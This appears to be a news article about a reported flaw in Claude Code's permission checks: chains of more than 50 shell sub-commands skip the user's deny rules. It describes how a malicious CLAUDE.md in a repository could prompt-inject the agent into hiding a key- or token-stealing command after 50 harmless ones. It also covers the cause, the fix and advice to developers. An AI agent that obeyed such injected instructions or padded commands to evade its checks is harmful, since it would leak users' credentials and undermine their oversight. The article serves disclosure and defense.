According to the latest update on April 7th, the security research firm Adversa AI discovered a critical high-risk vulnerability while conducting a deep review of the leaked Claude Code source code. This flaw could make developers shudder: when the tool processes composite commands with more than 50 sub-commands, it silently bypasses all user-set security filtering rules.

Vulnerability Reproduction: The 51st Command Is "Invisible" Malicious Code

Claude Code, as the fastest-growing AI coding assistant under Anthropic, allows developers to manage code repositories directly through the command line. To prevent sensitive data leaks, the system has built-in permission checks (such as prohibiting execution of curl or rm). However, researchers found that:

  • Stealth Bypass: If an attacker connects more than 50 sub-commands using && or ;, Claude Code will no longer check each subsequent command individually.

  • Attack Path: Attackers only need to create an open-source repository containing a malicious CLAUDE.md file and trick developers into running it. The AI may generate harmless commands for the first 50, then insert instructions to steal SSH keys or API tokens on the 51st command, which the system will automatically allow.

The Root Cause: A Trade-off for UI Smoothness

It is sad to note that this vulnerability was not due to technical incompetence but rather a “performance compromise.”

  • Internal Ticket Records: An internal ticket numbered CC-643 at Anthropic showed that engineers found that performing individual security analysis on long composite commands caused UI lag.

  • Assumption Broken: The development team believed that normal users would not input more than 50 sub-commands, so they set 50 as the analysis limit and reverted to a “user-confirmation” mode for commands beyond that. However, they overlooked that AI prompt injection attacks could easily break this human behavior assumption.

Irony of Reality: The Fix Was "Locked" in the Repository

Adversa AI's report indicated that Anthropic had actually developed a new parser based on tree-sitter, which can correctly verify security rules regardless of the command length. This mature code was already in the source code repository and had been tested, but for some reason, it was never applied to the production version delivered to customers.

Risk Assessment: Impacting 500,000 Developers, the "Safety Net" of a $2.5 Billion Product Now Has a Hole

Currently, this vulnerability has affected over 500,000 developers. As a core product generating $2.5 billion (about 17.23 billion RMB) in annual recurring revenue for Anthropic, the failure of the permission system means that the last line of defense for enterprise security teams has collapsed.

Latest Update: Officially Fixed

Fortunately, under the pressure of the “public audit” triggered by the source code leak, Anthropic released the Claude Code v2.1.90 version on April 4th. In the announcement, the official described this fix as a “denied rules degradation caused by parsing failure fallback,” and the vulnerability has now been officially patched.

Security Recommendations:

The research team reminds developers not to rely solely on AI tools' built-in deny rules as the sole security boundary. Before running any unknown repository with Claude Code, be sure to audit the CLAUDE.md file and restrict its Shell access to the minimum necessary scope.